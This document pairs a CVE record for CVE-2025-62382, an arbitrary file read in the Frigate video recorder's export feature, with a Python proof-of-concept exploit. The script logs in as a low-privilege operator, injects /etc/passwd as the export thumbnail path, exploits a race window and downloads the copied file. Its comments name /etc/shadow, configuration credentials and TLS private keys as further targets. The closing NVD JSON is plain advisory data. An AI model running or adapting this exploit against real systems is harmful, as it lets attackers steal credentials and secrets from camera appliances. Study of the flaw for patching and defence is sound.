CVE-2025-62382

# CVE-2025-62382 - Frigate Arbitrary File Read via Export Workflow # Exploits the lack of path validation in Frigate's export thumbnail feature # Requires: authenticated operator credentials (low privilege) import requests import time # Configuration FRIGATE_URL = "http://target-frigate-instance:5000" USERNAME = "operator" PASSWORD = "operator_password" # Step 1: Authenticate to obtain session/token session = requests.Session() login_resp = session.post( f"{FRIGATE_URL}/api/login", json={"user": USERNAME, "password": PASSWORD} ) token = login_resp.json().get("token") headers = {"Authorization": f"Bearer {token}"} # Step 2: Trigger export with arbitrary file path as thumbnail source # The vulnerable parameter accepts arbitrary filesystem paths target_file = "/etc/passwd" # Any file readable by the Frigate process export_payload = { "name": "legitimate_export", "thumb_path": target_file, # Path injected without validation (pre-0.16.2) "playback": "preview" } # Initiate the export job export_resp = session.post( f"{FRIGATE_URL}/api/export", json=export_payload, headers=headers ) export_id = export_resp.json().get("id") print(f"Export job created: {export_id}") # Step 3: Race window - access the copied file before cleanup runs # The file is copied to the publicly served clips directory time.sleep(0.5) # Brief delay to allow file copy # Step 4: Retrieve the exfiltrated file via public URL clip_url = f"{FRIGATE_URL}/clips/{export_id}/thumb.jpg" file_content = session.get(clip_url, headers=headers) print(f"Exfiltrated content of {target_file}:") print(file_content.text) # Sensitive targets could include: # - /etc/shadow, /etc/passwd # - /config/config.yml (Frigate configuration with credentials) # - Environment variables / secrets files # - TLS private keys

{"cve": {"id": "CVE-2025-62382", "sourceIdentifier": "[email protected]", "published": "2025-10-15T18:15:40.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.2, Frigate's export workflow allows an authenticated operator to nominate any filesystem location as the thumbnail source for a video export. Because that path is copied verbatim into the publicly served clips directory, the feature can be abused to read arbitrary files that reside on the host running Frigate. In practice, a low-privilege user with API access can pivot from viewing camera footage to exfiltrating sensitive configuration files, secrets, or user data from the appliance itself. This behavior violates the principle of least privilege for the export subsystem and turns a convenience feature into a direct information disclosure vector, with exploitation hinging on a short race window while the background exporter copies the chosen file into place before cleanup runs. This vulnerability is fixed in 0.16.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/commit/d7f7cd7be16bfe7a12766b797da6b8add687ccd9", "source": "[email protected]"}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-8gv4-5jr9-v96j", "source": "[email protected]"}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-8gv4-5jr9-v96j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}